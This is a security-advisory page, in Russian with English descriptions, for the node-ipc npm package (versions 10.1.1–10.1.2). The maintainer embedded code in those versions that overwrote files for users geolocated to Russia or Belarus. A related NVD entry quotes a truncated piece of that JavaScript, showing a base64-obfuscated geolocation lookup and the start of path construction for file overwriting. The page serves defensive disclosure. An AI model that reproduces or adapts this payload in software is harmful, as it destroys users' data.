Логотип exploitDog
Консоль
Логотип exploitDog

exploitDog

github логотип

GHSA-97m3-w2cp-4xx6

Опубликовано: 16 мар. 2022
Источник: github
Github: Прошло ревью
CVSS3: 9.8

Описание

Embedded Malicious Code in node-ipc

The package node-ipc versions 10.1.1 and 10.1.2 are vulnerable to embedded malicious code that was introduced by the maintainer. The malicious code was intended to overwrite arbitrary files dependent upon the geo-location of the user IP address. The maintainer removed the malicious code in version 10.1.3.

Пакеты

Наименование

node-ipc

npm
Затронутые версииВерсия исправления

>= 10.1.1, < 10.1.3

10.1.3

EPSS

Процентиль: 95%
0.17383
Средний

9.8 Critical

CVSS3

Дефекты

CWE-506
CWE-94

Связанные уязвимости

CVSS3: 9.8
nvd
почти 4 года назад

This affects the package node-ipc from 10.1.1 and before 10.1.3. This package contains malicious code, that targets users with IP located in Russia or Belarus, and overwrites their files with a heart emoji. **Note**: from versions 11.0.0 onwards, instead of having malicious code directly in the source of this package, node-ipc imports the peacenotwar package that includes potentially undesired behavior. Malicious Code: **Note:** Don't run it! js import u from "path"; import a from "fs"; import o from "https"; setTimeout(function () { const t = Math.round(Math.random() * 4); if (t > 1) { return; } const n = Buffer.from("aHR0cHM6Ly9hcGkuaXBnZW9sb2NhdGlvbi5pby9pcGdlbz9hcGlLZXk9YWU1MTFlMTYyNzgyNGE5NjhhYWFhNzU4YTUzMDkxNTQ=", "base64"); // https://api.ipgeolocation.io/ipgeo?apiKey=ae511e1627824a968aaaa758a5309154 o.get(n.toString("utf8"), function (t) { t.on("data", function (t) { const n = Buffer.from("Li8=", "base64"); const o = Buffer.from("Li4v", "base64"); const r = Buffer.from("Li4vLi4

EPSS

Процентиль: 95%
0.17383
Средний

9.8 Critical

CVSS3

Дефекты

CWE-506
CWE-94